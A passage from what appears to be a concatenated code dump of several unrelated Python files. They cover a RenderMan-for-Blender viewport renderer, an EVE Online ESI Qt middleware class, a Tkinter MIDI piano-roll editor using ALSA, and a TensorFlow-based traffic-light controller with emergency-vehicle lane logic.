dspy_plugin.ResetBufferUpdated()
def draw_pixels(self, width, height):
self.viewport_res_x = width
self.viewport_res_y = height
if self.rman_is_viewport_rendering:
dspy_plugin = self.get_blender_dspy_plugin()
# (the driver will handle pixel scaling to the given viewport size)
dspy_plugin.DrawBufferToBlender(ctypes.c_int(width), ctypes.c_int(height))
if self.do_draw_buckets():
# draw bucket indicator
image_num = 0
arXMin = ctypes.c_int(0)
arXMax = ctypes.c_int(0)
arYMin = ctypes.c_int(0)
arYMax = ctypes.c_int(0)
dspy_plugin.GetActiveRegion(ctypes.c_size_t(image_num), ctypes.byref(arXMin), ctypes.byref(arXMax), ctypes.byref(arYMin), ctypes.byref(arYMax))
if ( (arXMin.value + arXMax.value + arYMin.value + arYMax.value) > 0):
yMin = height-1 - arYMin.value
yMax = height-1 - arYMax.value
xMin = arXMin.value
xMax = arXMax.value
if self.rman_scene.viewport_render_res_mult != 1.0:
# render resolution multiplier is set, we need to re-scale the bucket markers
scaled_width = width * self.rman_scene.viewport_render_res_mult
xMin = int(width * ((arXMin.value) / (scaled_width)))
xMax = int(width * ((arXMax.value) / (scaled_width)))
scaled_height = height * self.rman_scene.viewport_render_res_mult
yMin = height-1 - int(height * ((arYMin.value) / (scaled_height)))
yMax = height-1 - int(height * ((arYMax.value) / (scaled_height)))
vertices = []
c1 = (xMin, yMin)
c2 = (xMax, yMin)
c3 = (xMax, yMax)
c4 = (xMin, yMax)
vertices.append(c1)
vertices.append(c2)
vertices.append(c3)
vertices.append(c4)
indices = [(0, 1), (1, 2), (2,3), (3, 0)]
# we've reach our max buckets, pop the oldest one off the list
if len(self.viewport_buckets) > RFB_VIEWPORT_MAX_BUCKETS:
self.viewport_buckets.pop()
self.viewport_buckets.insert(0,[vertices, indices])
bucket_color = get_pref('rman_viewport_bucket_color', default=RMAN_RENDERMAN_BLUE)
# draw from newest to oldest
for v, i in (self.viewport_buckets):
shader = gpu.shader.from_builtin('2D_UNIFORM_COLOR')
shader.uniform_float("color", bucket_color)
batch = batch_for_shader(shader, 'LINES', {"pos": v}, indices=i)
shader.bind()
batch.draw(shader)
# draw progress bar at the bottom of the viewport
if self.do_draw_progressbar():
progress = self.stats_mgr._progress / 100.0
progress_color = get_pref('rman_viewport_progress_color', default=RMAN_RENDERMAN_BLUE)
shader = gpu.shader.from_builtin('2D_UNIFORM_COLOR')
shader.uniform_float("color", progress_color)
vtx = [(0, 1), (width * progress, 1)]
batch = batch_for_shader(shader, 'LINES', {"pos": vtx})
shader.bind()
batch.draw(shader)
def get_numchannels(self, image_num):
dspy_plugin = self.get_blender_dspy_plugin()
num_channels = dspy_plugin.GetNumberOfChannels(ctypes.c_size_t(image_num))
return num_channels
def _get_buffer(self, width, height, image_num=0, num_channels=-1, back_fill=True, as_flat=True, render=None):
dspy_plugin = self.get_blender_dspy_plugin()
if num_channels == -1:
num_channels = self.get_numchannels(image_num)
if num_channels > 4 or num_channels < 0:
rfb_log().debug("Could not get buffer. Incorrect number of channels: %d" % num_channels)
return None
ArrayType = ctypes.c_float * (width * height * num_channels)
f = dspy_plugin.GetFloatFramebuffer
f.restype = ctypes.POINTER(ArrayType)
try:
buffer = numpy.array(f(ctypes.c_size_t(image_num)).contents)
pixels = list()
# we need to flip the image
# also, Blender is expecting a 4 channel image
if as_flat:
if num_channels == 4:
return buffer.tolist()
else:
for y in range(0, height):
i = (width * y * num_channels)
for x in range(0, width):
j = i + (num_channels * x)
if num_channels == 3:
pixels.append(buffer[j])
pixels.append(buffer[j+1])
pixels.append(buffer[j+2])
pixels.append(1.0)
elif num_channels == 2:
pixels.append(buffer[j])
pixels.append(buffer[j+1])
pixels.append(1.0)
pixels.append(1.0)
elif num_channels == 1:
pixels.append(buffer[j])
pixels.append(buffer[j])
pixels.append(buffer[j])
pixels.append(1.0)
return pixels
else:
if render and render.use_border:
start_x = 0
end_x = width
start_y = 0
end_y = height
if render.border_min_y > 0.0:
start_y = int(height * (render.border_min_y))-1
if render.border_max_y > 0.0:
end_y = int(height * (render.border_max_y))-1
if render.border_min_x > 0.0:
start_x = int(width * render.border_min_x)-1
if render.border_max_x < 1.0:
end_x = int(width * render.border_max_x)-2
# return the buffer as a list of lists
for y in range(start_y, end_y):
i = (width * y * num_channels)
for x in range(start_x, end_x):
j = i + (num_channels * x)
if not back_fill:
pixels.append(buffer[j:j+num_channels])
continue
if num_channels == 4:
pixels.append(buffer[j:j+4])
continue
pixel = [1.0] * num_channels
pixel[0] = buffer[j]
if num_channels == 3:
pixel[1] = buffer[j+1]
pixel[2] = buffer[j+2]
elif num_channels == 2:
pixel[1] = buffer[j+1]
elif num_channels == 1:
pixel[1] = buffer[j]
pixel[2] = buffer[j]
pixels.append(pixel)
return pixels
else:
buffer = numpy.reshape(buffer, (-1, num_channels))
return buffer.tolist()
except Exception as e:
rfb_log().debug("Could not get buffer: %s" % str(e))
return None
def save_viewport_snapshot(self, frame=1):
if not self.rman_is_viewport_rendering:
return
res_mult = self.rman_scene.viewport_render_res_mult
width = int(self.viewport_res_x * res_mult)
height = int(self.viewport_res_y * res_mult)
pixels = self._get_buffer(width, height)
if not pixels:
rfb_log().error("Could not save snapshot.")
return
nm = 'rman_viewport_snapshot_<F4>_%d' % len(bpy.data.images)
nm = string_utils.expand_string(nm, frame=frame)
img = bpy.data.images.new(nm, width, height, float_buffer=True, alpha=True)
img.pixels = pixels
img.update()
def update_scene(self, context, depsgraph):
if self.rman_interactive_running:
self.rman_scene_sync.update_scene(context, depsgraph)
def update_view(self, context, depsgraph):
if self.rman_interactive_running:
self.rman_scene_sync.update_view(context, depsgraph)
|
esi_processor.py
|
# esi_processor.py
import threading
from PySide2 import QtCore
from .esi.esi import ESI
class ESIProcessor(QtCore.QObject):
"""
ESI Middleware
"""
login_response = QtCore.Signal(str)
logout_response = QtCore.Signal()
location_response = QtCore.Signal(str)
destination_response = QtCore.Signal(bool)
def __init__(self, parent=None):
super().__init__(parent)
self.esi = ESI(self._login_callback, self._logout_callback)
def login(self):
return self.esi.start_server()
def logout(self):
self.esi.logout()
def get_location(self):
server_thread = threading.Thread(target=self._get_location)
server_thread.setDaemon(True)
server_thread.start()
def _get_location(self):
location = self.esi.get_char_location()
self.location_response.emit(location)
# TODO properly type this
def set_destination(self, sys_id):
server_thread = threading.Thread(target=self._set_destination, args=(sys_id, ))
server_thread.setDaemon(True)
server_thread.start()
# TODO properly type this
def _set_destination(self, sys_id):
response = self.esi.set_char_destination(sys_id)
self.destination_response.emit(response)
# TODO properly type this
def _login_callback(self, char_name):
self.login_response.emit(char_name)
def _logout_callback(self):
self.logout_response.emit()
|
midiedit.py
|
from abc import abstractmethod, ABC
from enum import Enum
import os
from queue import Queue
import select
import time
from alsa_midi import SND_SEQ_OPEN_OUTPUT, SND_SEQ_OPEN_INPUT
from amidi import PortInfo, Sequencer
from midi import AllSoundOff, ControlChange, Event as MIDIEvent, NoteOn, \
NoteOff, Piece, PitchWheel, ProgramChange, SetTempo, Track, TrackCursor
from midifile import Reader as MidiFileReader, Writer as MidiFileWriter
from threading import Thread
from typing import Callable, Optional, Tuple, Union
from tkinter import Canvas, Event, Frame, Label, Scrollbar, Tk, Toplevel, \
PhotoImage, BOTH, HORIZONTAL, VERTICAL, NSEW
ROW_HEIGHT = 10
## Width of the key panel on the left hand side.
KEYS_WIDTH = 40
DEFAULT_NOTE_WIDTH = 40
NOTE_FILL_COLOR = '#00ff00'
POS_MARKER_COLOR = '#ff0000'
NOTE_COLORS = [0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0]
GRID_LINE_COLOR = '#000044'
# The outline color of notes.
SELECT_OUTLINE = 'white'
NORMAL_OUTLINE = 'black'
class DragMode(Enum):
NONE = 0 # Not dragging.
MOVE = 1 # Move a note to a different note or position
EXTEND = 2 # Make the note longer or shorter or start earlier/later
class AudioIFace(ABC):
@abstractmethod
def begin_note_edit(self, note: int, velocity: int) -> None:
"""To be called the first time a note is moved.
"""
@abstractmethod
def next_note_edit(self, note: int, velocity: int) -> None:
"""To be called on a subsequent note move.
It is the responsibility of this interface to do nothing if 'note' has
not changed since the last time.
"""
@abstractmethod
def end_note_edit(self) -> None:
"""To be called when a note edit has ended."""
@abstractmethod
def play(self, track: Track):
"""Begin playing."""
@abstractmethod
def set_play_callback(self, func: Callable[[int], None]) -> None:
"""Set the callback used to inform the UI of position changes.
'func' should be callable from any thread, not necessarily just the UI
thread. It is passed the current play position (in ticks).
"""
@abstractmethod
def set_event_recorder(self, func: Callable[[MIDIEvent], None]) -> None:
"""Set a function to be called when a new event comes in during play.
"""
@abstractmethod
def set_pos(self, pos: int) -> None:
"""Set the current play position (in ticks)."""
@abstractmethod
def get_pos(self) -> int:
"""Return the current play position (in ticks)."""
@abstractmethod
def stop(self):
"""Stop playing."""
@abstractmethod
def isPlaying(self) -> bool:
"""Returns true if the interface is currently playing."""
@property
def playing(self) -> bool:
"""Returns true if the interface is currently playing.
This is just the property form of isPlaying().
"""
return self.isPlaying()
class MidiEditor(Frame):
def __init__(self, toplevel: Union[Tk, Toplevel, None] = None,
track: Optional[Track] = None,
audio: Optional[AudioIFace] = None
):
super(MidiEditor, self).__init__(toplevel)
self.__track = Track('track') if track is None else track
self.__canvas = Canvas(self, background='#000011')
self.__canvas.grid(row=0, column=1, sticky=NSEW)
self.__canvas.focus_set()
self.pack(expand=True, fill=BOTH)
self.__draw_canvas()
hsb = Scrollbar(self, orient=HORIZONTAL, command=self.__canvas.xview)
hsb.grid(row=1, column=1, sticky=NSEW)
vsb = Scrollbar(self, orient=VERTICAL, command=self.__canvas.yview)
vsb.grid(row=0, column=2, sticky=NSEW)
self.__canvas.config(xscrollcommand=hsb.set, yscrollcommand=vsb.set)
# Set up the queue. This is to allow background threads to post
# changes to the Tk thread.
self.__queue : 'Queue[Callable[[], Any]]' = Queue()
# A mapping from the ids of the widgets that represent notes to the
# list of note events that comprise them.
# At present, there will usually be exactly two events in this list.
# However, if support for aftertouch events are added, they will
# likely be included in this list, too.
self.__note_map : Dict[int, List[Event]] = {}
self.__key_canvas = Canvas(self, width=KEYS_WIDTH)
self.__key_canvas.grid(row=0, column=0, sticky=NSEW)
for i in range(0, 128):
y = (127 - i) * ROW_HEIGHT
color = '#000000' if NOTE_COLORS[i % 12] else '#ffffff'
self.__key_canvas.create_rectangle(0, y, KEYS_WIDTH, y + ROW_HEIGHT,
fill=color,
outline='#000044')
self.columnconfigure(1, weight=1)
self.rowconfigure(0, weight=1)
# Drag parameters.
# Offset from the note position to the mouse position at the start of
# the drag.
self.__drag_offset : Optional[Tuple[int, int]] = None
# X position at the start of the drag.
self.__drag_org_x : int = 0
# Current drag mode.
self.__drag_mode : DragMode = DragMode.NONE
# "Pulses per beat" (usually "Pulses per quarter note.")
self.__ppb : int = self.__track.ppqn
# The current default note length, channel and velocity for new notes.
self.__note_len : int = self.__ppb
self.__channel : int = 0
self.__velocity : int = 127
# The desired width of a beat ("quarter note") in screen pixels.
self.__beat_width : float = 40.0
# Time signature, expressed as beats per measure.
self.__sig : int = 4
# The number of midi clock ticks ("pulses") per x axis unit on the
# screen.
self.__ticks_per_x_unit : float = self.__ppb / self.__beat_width
self.__audio = audio
# Key bindings. We have to bind these to the toplevel, the frame
# won't intercept them.
toplevel.bind('<space>', self.__toggle_play)
toplevel.bind('<Left>', self.__left_note)
toplevel.bind('<Right>', self.__right_note)
# Render the note and measure lines.
measure = self.__ppb * self.__sig
note = self.__ppb
end_time = track[-1].time if track else (measure * 20)
t = note
while t < end_time + measure:
x = self.__x_from_time(t)
self.__canvas.create_line(x, 0, x, 128 * ROW_HEIGHT,
fill=GRID_LINE_COLOR,
dash=(3, 3) if t % measure else None
)
t += note
self.__canvas.config(scrollregion=(0, 0, self.__x_from_time(end_time),
128 * ROW_HEIGHT
)
)
self.__canvas.bind('<Delete>', self.__delete_selected)
# Render the position line.
if audio:
self.__play_callback(0)
audio.set_play_callback(self.__play_callback)
audio.set_event_recorder(self.get_event_recorder())
self.__pos_marker = self.__canvas.create_line(x, 0, x,
128 * ROW_HEIGHT,
fill=POS_MARKER_COLOR
)
# Render the notes in the initial track.
active = {}
for note in track:
if isinstance(note, NoteOn):
active[note.note] = note
elif isinstance(note, NoteOff):
try:
start = active.pop(note.note)
id = self.__draw_new_note(start.note, start.time,
note.time)
self.__note_map[id] = [start, note]
except KeyError:
print('Unmatched end note: %s' % note.note)
self.after(100, self.__process_queue)
# Position Navigation functions
def __left_note(self, event: Event):
"""Move the play-head one beat left (back in time)."""
pos = self.__audio.get_pos()
if not pos:
# Do nothing if we're already at zero.
return
if pos % self.__ppb:
# between two notes, quantify to the previous one.
pos = pos // self.__ppb * self.__ppb
else:
pos = (pos // self.__ppb - 1) * self.__ppb
self.__audio.set_pos(pos)
def __right_note(self, event: Event):
"""Move the play-head one beat right (forward in time)."""
self.__audio.set_pos(
(self.__audio.get_pos() // self.__ppb + 1) * self.__ppb
)
def __process_queue(self) -> None:
"""Process all events on the queue.
Then schedule the next queue processing interval.
"""
while not self.__queue.empty():
self.__queue.get()()
self.after(100, self.__process_queue)
def __draw_pos(self, pos: int) -> None:
x = pos / self.__ticks_per_x_unit
self.__canvas.coords(self.__pos_marker, x, 0, x, 128 * ROW_HEIGHT)
def __play_callback(self, pos: int) -> None:
# queue a draw_pos call.
self.__queue.put(lambda: self.__draw_pos(pos))
def __save_track(self, event: Event):
"""Saves the track. REMOVE THIS"""
print('that is all')
piece = Piece()
piece.addTrack(self.__track)
MidiFileWriter(open('unnamed.mid', 'wb')).writePiece(piece)
def __note_from_y(self, y: int) -> int:
return int(127 - y // ROW_HEIGHT)
def __y_from_note(self, note: int) -> float:
return -(note - 127) * ROW_HEIGHT
def __time_from_x(self, x: int) -> int:
"""Returns the time for a given x coordinate.
Time is measured in ticks since the beginning of the track.
"""
return int(x * self.__ticks_per_x_unit)
def __x_from_time(self, t: int) -> int:
return int(t / self.__ticks_per_x_unit)
def __select_single(self, id: int) -> None:
"""Select a single note, unselect current selections."""
self.__canvas.itemconfigure('selected', outline=NORMAL_OUTLINE)
self.__canvas.dtag('selected', 'selected')
self.__canvas.itemconfigure(id, tags=['selected'],
outline=SELECT_OUTLINE)
def __toggle_select(self, id: int) -> None:
"""Toggle the selection status of a given element."""
tags = self.__canvas.gettags(id)
if 'selected' in tags:
self.__canvas.dtag(id, 'selected')
self.__canvas.itemconfigure(id, outline=NORMAL_OUTLINE)
else:
self.__canvas.itemconfigure(id, tags=['selected'],
outline=SELECT_OUTLINE)
def __delete_selected(self, event: Event):
"""Delete all selected notes."""
for item in self.__canvas.find_withtag('selected'):
for midi_event in self.__note_map[item]:
self.__track.remove(midi_event)
del self.__note_map[item]
self.__canvas.delete(item)
def __get_x(self, event: Event) -> int:
"""Returns the x coordinate for an event's screen y coordinate."""
return int(self.__canvas.canvasx(event.x))
def __get_y(self, event: Event) -> int:
"""Returns the y coordinate for an event's screen y coordinate."""
return int(self.__canvas.canvasy(event.y))
def __end_drag(self, id: int, event: Event) -> Optional[str]:
self.__canvas.tag_unbind(id, '<Motion>')
self.__canvas.tag_unbind(id, '<ButtonRelease-1>')
self.__audio.end_note_edit()
if self.__drag_mode == DragMode.MOVE:
# Move the original events to the new time and note.
note = self.__note_from_y(self.__get_y(event))
t = self.__time_from_x(self.__get_x(event) - self.__drag_offset[0])
events = self.__note_map[id]
start_time = events[0].time
for event in events:
if isinstance(event, (NoteOn, NoteOff)):
event.note = note
if t != start_time:
event.time = t + event.time - start_time
self.__track.reposition(event)
elif self.__drag_mode == DragMode.EXTEND:
length = self.__get_x(event) - self.__drag_org_x
events = self.__note_map[id]
events[1].time += self.__time_from_x(length)
self.__track.reposition(events[1])
self.__drag_mode = DragMode.NONE
self.__drag_offset = None
self.__drag_org_x = 0
def __drag(self, id: int, event: Event) -> Optional[str]:
if self.__drag_mode == DragMode.MOVE:
note = self.__note_from_y(self.__get_y(event))
y = (127 - note) * ROW_HEIGHT
x = self.__get_x(event) - self.__drag_offset[0]
x1, _, x2, _ = self.__canvas.coords(id)
self.__canvas.coords(id, x, y, x + x2 - x1, y + ROW_HEIGHT)
self.__audio.next_note_edit(note, velocity=127)
elif self.__drag_mode == DragMode.EXTEND:
length = self.__get_x(event) - self.__drag_org_x
x1, y1, x2, y2 = self.__canvas.coords(id)
events = self.__note_map[id]
org_len = self.__x_from_time(events[1].time - events[0].time)
if length + org_len > 0:
self.__canvas.coords(id, x1, y1, x1 + org_len + length, y2)
def __begin_drag(self, id: int, event: Event, mode: DragMode) -> None:
cx, cy, _, _ = self.__canvas.coords(id)
self.__drag_org_x = self.__get_x(event)
self.__drag_offset = (self.__get_x(event) - cx, self.__get_y(event) - cy)
self.__canvas.tag_bind(id, '<Motion>', lambda e: self.__drag(id, e))
self.__canvas.tag_bind(id, '<ButtonRelease-1>',
lambda e: self.__end_drag(id, e)
)
self.__drag_mode = mode
self.__audio.begin_note_edit(self.__note_from_y(cy), velocity=127)
def __begin_drag_note(self, id: int, event: Event) -> Optional[str]:
self.__select_single(id)
self.__begin_drag(id, event, DragMode.MOVE)
return 'break'
def __begin_duration_drag(self, id: int, event: Event) -> Optional[str]:
self.__select_single(id)
self.__begin_drag(id, event, DragMode.EXTEND)
return 'break'
def __toggle_select_handler(self, id: int, event: Event) -> None:
# We don't really have any meaningful "drag" semantics to this yet,
# but it still has a lot of the semmantics of a drag event.
self.__begin_drag(id, event, DragMode.NONE)
self.__toggle_select(id)
def __draw_new_note(self, note: int, t1: int, t2: int) -> int:
y = self.__y_from_note(note)
x1 = self.__x_from_time(t1)
x2 = self.__x_from_time(t2)
id = self.__canvas.create_rectangle(x1, y, x2, y + ROW_HEIGHT,
fill=NOTE_FILL_COLOR)
self.__canvas.tag_bind(id, '<Button-1>',
lambda e: self.__begin_drag_note(id, e)
)
self.__canvas.tag_bind(id, '<Shift-Button-1>',
lambda e: self.__begin_duration_drag(id, e)
)
self.__canvas.tag_bind(id, '<Control-Button-1>',
lambda e: self.__toggle_select_handler(id, e)
)
return id
def __add_note(self, event: Event) -> Optional[str]:
# Ignore this if we've started a drag. It seems that we still get
# this event even if the handler for the item returns 'break'.
if self.__drag_offset:
return
note = self.__note_from_y(self.__get_y(event))
t = self.__time_from_x(self.__get_x(event))
self.__audio.begin_note_edit(note, velocity=127)
note_on = NoteOn(t, self.__channel, note, self.__velocity)
note_off = NoteOff(t + self.__note_len, self.__channel, note, 0)
self.__add_note_pair(note_on, note_off)
def __add_note_pair(self, note_on: NoteOn, note_off: NoteOff) -> None:
id = self.__draw_new_note(note_on.note, note_on.time,
note_off.time)
self.__track.add(note_on)
self.__track.add(note_off)
self.__note_map[id] = [note_on, note_off]
self.__select_single(id)
def get_event_recorder(self) -> Callable[[MIDIEvent], None]:
"""Returns a function that records midi events.
The function returned can safely be called from any thread.
"""
# Keeps track of which notes from the input device have a NoteOn
# event that hasn't been closed.
note_map : Dict[int, NoteOn] = {}
def record_event(event: MIDIEvent):
# The internal record-event function, that actually stores the
# event in the track.
if isinstance(event, NoteOn):
note_map[event.note] = event
elif isinstance(event, NoteOff):
start = note_map.get(event.note)
if start:
self.__add_note_pair(start, event)
del note_map[event.note]
else:
self.__track.add(event)
def on_event(event: MIDIEvent):
# This is the returned record function that is safe to call in a
# non-ui thread.
self.__queue.put(lambda: record_event(event))
return on_event
def __end_add_note(self, event: Event) -> None:
self.__audio.end_note_edit()
def __toggle_play(self, event: Event) -> None:
if self.__audio.playing:
self.__audio.stop()
else:
self.__audio.play(self.__track)
def __draw_canvas(self) -> None:
# draw the grid.
for i in range(0, 128):
y = i * ROW_HEIGHT
#self.__canvas.winfo_width()
self.__canvas.create_line(0, y, 1000000, y, fill=GRID_LINE_COLOR)
self.__canvas.bind('<Button-1>', self.__add_note)
self.__canvas.bind('<ButtonRelease-1>', self.__end_add_note)
class MidiEditToplevel(Toplevel):
"""Standalone toplevel for hosting the midi editor."""
def __init__(self, track: Track, on_save: Callable[[Track], None] = None):
MidiEditor(self, track)
if on_save:
self.bind('<F2>', lambda e: on_save(track))
class AlsaAudioIFace(AudioIFace):
def __init__(self, seq: Sequencer, port: PortInfo, ppb: int):
self.seq = seq
self.port = port
self.__last_note = -1
self.__pos = 0
# Start ticks per sec as a bogus value, respond to a SetTempo event
# while replaying.
self.__ticks_per_sec = 48
self.__stopped = True
self.__callback = None
self.__record_event = None
self.__thread = None
self.__track = None
self.__ppb = ppb
def begin_note_edit(self, note: int, velocity: int) -> None:
self.seq.sendEvent(NoteOn(0, 0, note, velocity), self.port)
self.__last_note = note
def next_note_edit(self, note: int, velocity: int) -> None:
if note != self.__last_note:
self.seq.sendEvent(NoteOff(0, 0, self.__last_note, 0), self.port)
self.seq.sendEvent(NoteOn(0, 0, note, velocity), self.port)
self.__last_note = note
def end_note_edit(self) -> None:
if self.__last_note == -1:
return
self.seq.sendEvent(NoteOff(0, 0, self.__last_note, 0), self.port)
self.__last_note = -1
def __run(self) -> None:
try:
# start time is the time when the beginning of the track started
start_time = time.time() - self.__pos / self.__ticks_per_sec
# Get the input handler to allow us to read midi events.
input_handle = self.seq.getPollHandle()
# 't' is current time in ticks.
t = self.__pos
cur = TrackCursor(self.__track)
cur.setPos(t)
while True:
event = cur.nextEvent()
if not event:
return
# Wait for the next event, doing a notification callback
# periodically.
next_event_ticks = event.time
tps = self.__ticks_per_sec
while t < next_event_ticks:
handles = select.select([input_handle], [], [input_handle],
min((next_event_ticks - t) / tps,
0.25
)
)
if self.__stopped:
return
self.__pos = t = int((time.time() - start_time) * tps)
# Process all input events.
if handles[0]:
while self.seq.hasEvent():
ev = self.seq.getEvent(t)
if isinstance(ev,
(NoteOn, NoteOff, ControlChange,
ProgramChange, PitchWheel)
):
self.seq.sendEvent(ev, self.port)
if self.__record_event:
self.__record_event(ev)
else:
print(f'got unknonwn event {ev}')
if self.__callback:
self.__callback(t)
if isinstance(event, (NoteOn, NoteOff, ControlChange,
ProgramChange, PitchWheel
)
):
self.seq.sendEvent(event, self.port)
elif isinstance(event, SetTempo):
print(f'usecs per qn {event.tempo}')
self.__ticks_per_sec = 1000000 / event.tempo * self.__ppb
finally:
for channel in range(16):
self.seq.sendEvent(AllSoundOff(0, channel), self.port)
def play(self, track: Track) -> None:
if not self.__stopped:
return
self.__stopped = False
self.__track = track
Thread(target=self.__run).start()
def set_play_callback(self, func: Callable[[int], None]) -> None:
self.__callback = func
def set_event_recorder(self, func: Callable[[MIDIEvent], None]) -> None:
self.__record_event = func
def set_pos(self, pos: int) -> None:
self.__pos = pos
if self.__callback:
self.__callback(pos)
def get_pos(self) -> int:
return self.__pos
def stop(self) -> None:
self.__stopped = True
def isPlaying(self) -> bool:
return not self.__stopped
if __name__ == '__main__':
from sys import argv
track : Optional[Track] = None
if len(argv) > 1:
filename = argv[1]
if os.path.exists(filename):
piece = MidiFileReader(open(filename, 'rb')).readPiece()
track = tuple(piece.getTracks())[0]
else:
filename = 'unnamed.mid'
i = 1
while os.path.exists(filename):
filename = 'unnamed%s.mid' % i
i += 1
if track is None:
track = Track('unnamed')
def save(e: Event) -> None:
piece = Piece()
piece.addTrack(track)
MidiFileWriter(open(filename, 'wb')).writePiece(piece)
tk = Tk()
tk.bind('<F2>', save)
seq = Sequencer(SND_SEQ_OPEN_INPUT | SND_SEQ_OPEN_OUTPUT, 0, name='midiedit')
port = seq.createOutputPort('out')
seq.createInputPort('in')
print(f'ppqn = {track.ppqn}')
win = MidiEditor(tk, track, AlsaAudioIFace(seq, port, track.ppqn))
win.mainloop()
|
itmsFFLAP.py
|
import numpy as np
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import six.moves.urllib as urllib
import sys
from goto import with_goto
import threading
from threading import Thread
from multiprocessing import Process,Lock
import tarfile
#import RPi.GPIO as GPIO
#GPIO.setwarnings(False)
import time
from prettytable import PrettyTable
from datetime import date
from datetime import datetime
import tensorflow.compat.v1 as tf
from collections import defaultdict
from io import StringIO
import matplotlib.pyplot as plt
from PIL import Image
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
# This is needed since the notebook is stored in the object_detection folder.
sys.path.append("..")
# script repurposed from sentdex's edits and TensorFlow's example script. Pretty messy as not all unnecessary
# parts of the original have been removed
# # Model preparation
# ## Variables
# Any model exported using the `export_inference_graph.py` tool can be loaded here simply by changing `PATH_TO_CKPT` to point to a new .pb file.
# By default we use an "SSD with Mobilenet" model here. See the [detection model zoo](https://github.com/tensorflow/models/blob/master/object_detection/g3doc/detection_model_zoo.md) for a list of other models that can be run out-of-the-box with varying speeds and accuracies.
lock=threading.Lock()
lockg=threading.Lock()
'''maxlimit = threading.Semaphore(2)
#GPIO OUTPUT SET
GPIO.setmode(GPIO.BOARD)
GPIO.setup(36,GPIO.OUT)
GPIO.setup(38,GPIO.OUT)
GPIO.setup(40,GPIO.OUT)
GPIO.setup(8,GPIO.OUT)
GPIO.setup(10,GPIO.OUT)
GPIO.setup(12,GPIO.OUT)
GPIO.setup(11,GPIO.OUT)
GPIO.setup(13,GPIO.OUT)
GPIO.setup(15,GPIO.OUT)
GPIO.setup(19,GPIO.OUT)
GPIO.setup(21,GPIO.OUT)
GPIO.setup(23,GPIO.OUT)
#ALLOFF
GPIO.output(38,0)
GPIO.output(10,0)
GPIO.output(13,0)
GPIO.output(21,0)
GPIO.output(12,0)
GPIO.output(15,0)
GPIO.output(23,0)
GPIO.output(40,0)
GPIO.output(36,0)
GPIO.output(8,0)
GPIO.output(11,0)
GPIO.output(19,0)
#RED-ON
GPIO.output(12,1)
GPIO.output(15,1)
GPIO.output(23,1)
GPIO.output(40,1)'''
MODEL_NAME = 'trained_model' # change to whatever folder has the new graph
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join('training', 'label.pbtxt') # our labels are in training/object-detection.pbkt
NUM_CLASSES = 3 # we only are using one class at the moment (mask at the time of edit)
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# ## Loading label map
# Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`. Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine
# In[7]:
def gpio(lock,emergency,t):
lock.acquire()
print("GPIO Thread Activated")
time.sleep(40)
print("")
print("-----------------------------------------------------------------")
'''#LANE01
if(4==len(emergency)):
if(emergency[1] == 1):
print("Emergency Vehicle Detected in Lane 2")
#gpio_lane2
GPIO.output(12,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(8,1)
time.sleep(t[1])
GPIO.output(8,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(12,1)
if(4==len(emergency)):
if(emergency[2] == 1):
print("Emergency Vehicle Detected in Lane 3")
#gpio_lane3
GPIO.output(15,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(11,1)
time.sleep(t[2])
GPIO.output(11,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(15,1)
if(4==len(emergency)):
if(emergency[3] == 1):
print("Emergency Vehicle Detected in Lane 4 ")
#gpio_lane 4
GPIO.output(23,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(19,1)
time.sleep(t[3])
GPIO.output(19,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(23,1)
GPIO.output(40,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(36,1)
time.sleep(t[0])
GPIO.output(36,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(40,1)
if(4==len(emergency)):
if(emergency[1] == 1):
print("Emergency Vehicle Detected in Lane 2")
#gpio_lane2
GPIO.output(12,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(8,1)
time.sleep(t[1])
GPIO.output(8,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(12,1)
if(4==len(emergency)):
if(emergency[2] == 1):
print("Emergency Vehicle Detected in Lane 3")
#gpio_lane3
GPIO.output(15,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(11,1)
time.sleep(t[2])
GPIO.output(11,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(15,1)
if(4==len(emergency)):
if(emergency[3] == 1):
print("Emergency Vehicle Detected in Lane 4 ")
#gpio_lane 4
GPIO.output(23,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(19,1)
time.sleep(t[3])
GPIO.output(19,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(23,1)
#LANE02
GPIO.output(12,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(8,1)
time.sleep(t[1])
GPIO.output(8,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(12,1)
if(4==len(emergency)):
if(emergency[0] == 1):
print("Emergency Vehicle Detected in Lane 1")
#gpio_lane1
GPIO.output(40,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(36,1)
time.sleep(t[0])
GPIO.output(36,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(40,1)
if(4==len(emergency)):
if(emergency[2] == 1):
print("Emergency Vehicle Detected in Lane 3")
